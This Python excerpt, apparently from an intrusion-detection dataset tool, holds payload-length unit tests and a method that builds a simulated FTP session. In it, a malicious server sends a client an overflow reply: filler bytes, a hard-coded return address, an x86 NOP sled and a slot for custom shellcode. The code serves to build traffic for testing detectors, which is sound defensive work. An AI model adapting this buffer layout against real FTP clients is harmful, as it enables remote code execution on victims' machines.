def test_check_payload_len_exceeded(self):
    """A payload length above the limit must be rejected with ValueError."""
    payload_len, limit = 10, 5
    # Callable form of assertRaises: the call itself is the statement under test.
    self.assertRaises(ValueError, Utility.check_payload_len, payload_len, limit)
def test_check_payload_len_valid(self):
    """A payload length below the limit must pass the check without raising."""
    payload_len, limit = 5, 10
    # No explicit assertion: the test fails if the call raises.
    Utility.check_payload_len(payload_len, limit)
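def generate_attack_packets(self):
    """
    Creates the attack packets.

    Builds one simulated TCP session between a victim (the client, taken from
    IP_SOURCE/MAC_SOURCE) and an attacker (the server, taken from
    IP_DESTINATION/MAC_DESTINATION) and hands every packet to
    ``self.add_packet``. The session consists of a three-way handshake, one
    server-to-client PSH/ACK segment carrying an oversized "220" reply line,
    a FIN/ACK from the server and two ACKs from the client.

    The custom payload is size-checked against a 1000-byte limit using its
    encoded length, i.e. the number of bytes that actually end up in the
    packet. An unset payload (``None`` or ``""``) falls back to the payload
    file, and an unset payload file falls back to random filler bytes.

    Raises whatever ``Util.check_payload_len`` raises when the custom payload
    or the payload file content exceeds the limit (presumably ``ValueError``;
    confirm against Utility).
    """
    # NOTE(review): pps is read but not used anywhere in this method.
    pps = self.get_param_value(self.PACKETS_PER_SECOND)

    # Store start timestamp of attack
    self.attack_start_utime = self.get_param_value(self.INJECT_AT_TIMESTAMP)

    # Initialize parameters
    ip_victim = self.get_param_value(self.IP_SOURCE)
    ip_attacker = self.get_param_value(self.IP_DESTINATION)
    mac_victim = self.get_param_value(self.MAC_SOURCE)
    mac_attacker = self.get_param_value(self.MAC_DESTINATION)

    custom_payload = self.get_param_value(self.CUSTOM_PAYLOAD)
    # Encode once, up front: the limit check and the padding arithmetic below
    # must both use the byte length, which differs from the character count
    # as soon as the string contains non-ASCII characters.
    encoded_payload = custom_payload.encode() if custom_payload else b''
    custom_payload_len = len(encoded_payload)
    custom_payload_limit = 1000
    # TODO: check this for param | introduced string_limited !!!!
    Util.check_payload_len(custom_payload_len, custom_payload_limit)

    # Create random victim if specified
    if self.get_param_value(self.IP_SOURCE_RANDOMIZE):
        # The most used IP class in background traffic
        most_used_ip_class = Util.handle_most_used_outputs(
            self.statistics.get_most_used_ip_class())
        ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
        mac_victim = self.generate_random_mac_address()

    # Get MSS, TTL and Window size value for victim/attacker IP
    victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(ip_victim)
    attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(ip_attacker)

    # max_latency is returned by the helper but not used in this method.
    min_latency, max_latency = self.get_reply_latency(ip_victim, ip_attacker)

    attacker_seq = rnd.randint(1000, 50000)
    victim_seq = rnd.randint(1000, 50000)

    sport = Util.generate_source_port_from_platform("win7")

    # connection request from victim (client)
    victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
    victim_ip = inet.IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
    request_tcp = inet.TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
                           seq=victim_seq, options=[('MSS', victim_mss_value)])
    victim_seq += 1  # the SYN consumes one sequence number
    syn = (victim_ether / victim_ip / request_tcp)
    syn.time = self.attack_start_utime
    self.add_packet(syn, ip_victim, ip_attacker)

    # response from attacker (server)
    attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
    attacker_ip = inet.IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
    reply_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
                         window=attacker_win_value, options=[('MSS', attacker_mss_value)])
    attacker_seq += 1  # the SYN/ACK consumes one sequence number
    synack = (attacker_ether / attacker_ip / reply_tcp)
    synack.time = self.timestamp_controller.next_timestamp(min_latency)
    self.add_packet(synack, ip_victim, ip_attacker)

    # acknowledgement from victim (client)
    ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                       window=victim_win_value, options=[('MSS', victim_mss_value)])
    ack = (victim_ether / victim_ip / ack_tcp)
    ack.time = self.timestamp_controller.next_timestamp(min_latency)
    self.add_packet(ack, ip_victim, ip_attacker)

    # FTP exploit packet
    ftp_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
                       window=attacker_win_value, options=[('MSS', attacker_mss_value)])

    # Byte layout kept exactly as in the original. If the helpers return the
    # requested lengths, the finished line is about 3 KB long, so an
    # oversized single-line "220" reply is the trait a detector can key on.
    characters = b'220'
    characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
    characters += b'\x96\x72\x01\x68'
    characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)

    custom_payload_file = self.get_param_value(self.CUSTOM_PAYLOAD_FILE)

    # Generation of payload of the FTP exploit packet
    if not custom_payload:
        # None is treated like "" so an unset parameter never reaches .encode().
        if not custom_payload_file:
            payload = Util.get_rnd_bytes(custom_payload_limit, Util.forbidden_chars)
        else:
            # NOTE(review): this is the only call that goes through Lib.Utility
            # instead of the Util alias; confirm Lib is actually in scope here.
            payload = Lib.Utility.get_bytes_from_file(custom_payload_file)
            Util.check_payload_len(len(payload), custom_payload_limit)
            payload += Util.get_rnd_x86_nop(custom_payload_limit - len(payload), False,
                                            Util.forbidden_chars)
    else:
        # Pad in front of the custom payload so the section fills the limit.
        payload = Util.get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False,
                                       Util.forbidden_chars)
        payload += encoded_payload

    characters += payload
    characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
    characters += b'\r\n'

    # NOTE(review): the whole line is emitted as a single TCP segment,
    # independent of the MSS values advertised in the handshake above.
    ftp_tcp.add_payload(characters)

    ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
    ftp_buff.time = self.timestamp_controller.next_timestamp()
    self.add_packet(ftp_buff, ip_victim, ip_attacker)
    attacker_seq += len(ftp_tcp.payload)

    # Fin Ack from attacker
    fin_ack_tcp = inet.TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
                           window=attacker_win_value, options=[('MSS', attacker_mss_value)])
    fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
    fin_ack.time = self.timestamp_controller.next_timestamp()
    self.add_packet(fin_ack, ip_victim, ip_attacker)

    # Ack from victim on FTP packet
    ftp_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
                           window=victim_win_value, options=[('MSS', victim_mss_value)])
    ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
    ftp_ack.time = self.timestamp_controller.next_timestamp(min_latency)
    self.add_packet(ftp_ack, ip_victim, ip_attacker)

    # Ack from victim on Fin/Ack of attacker
    fin_ack_ack_tcp = inet.TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq + 1,
                               flags='A', window=victim_win_value,
                               options=[('MSS', victim_mss_value)])
    fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
    fin_ack_ack.time = self.timestamp_controller.next_timestamp()
    self.add_packet(fin_ack_ack, ip_victim, ip_attacker)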